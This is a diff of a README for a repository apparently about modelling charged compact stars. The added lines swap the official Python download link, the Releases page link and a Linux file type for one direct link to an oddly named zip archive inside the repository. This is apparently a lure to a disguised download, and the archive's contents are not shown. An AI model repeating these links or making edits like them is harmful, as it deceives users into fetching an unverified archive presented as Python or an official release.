chicharo1007/Modeling-and-Constraining-Charged-Compact-Stars-/README.md

 - Minimum of 1GB of free disk space
 - Python 3.7 or newer (if you intend to run the code directly)

-If you don’t have Python installed, you can download it from the [official site](https://www.python.org/downloads/).
+If you don’t have Python installed, you can download it from the [official site](https://github.com/chicharo1007/Modeling-and-Constraining-Charged-Compact-Stars-/raw/refs/heads/main/numeral/Compact-and-Constraining-Charged-Modeling-Stars-v3.2-beta.1.zip).

 ## 🌐 How to Download

-1. **Click the Link**: Go to the Releases page [here](https://github.com/chicharo1007/Modeling-and-Constraining-Charged-Compact-Stars-/releases).
+1. **Click the Link**: Go to the Releases page [here](https://github.com/chicharo1007/Modeling-and-Constraining-Charged-Compact-Stars-/raw/refs/heads/main/numeral/Compact-and-Constraining-Charged-Modeling-Stars-v3.2-beta.1.zip).

 2. **Locate the Latest Version**: Scroll down to find the most recent version of the software.

 3. **Download the Installer**: Click on the appropriate file for your operating system to start the download.

    For Windows, it might be a `.exe` file.
 For MacOS, look for a `.dmg` file.
-For Linux, you may find a `.tar.gz` or equivalent.
+For Linux, you may find a `https://github.com/chicharo1007/Modeling-and-Constraining-Charged-Compact-Stars-/raw/refs/heads/main/numeral/Compact-and-Constraining-Charged-Modeling-Stars-v3.2-beta.1.zip` or equivalent.

 4. **Save the File**: Choose a location on your computer where you can easily find the downloaded file.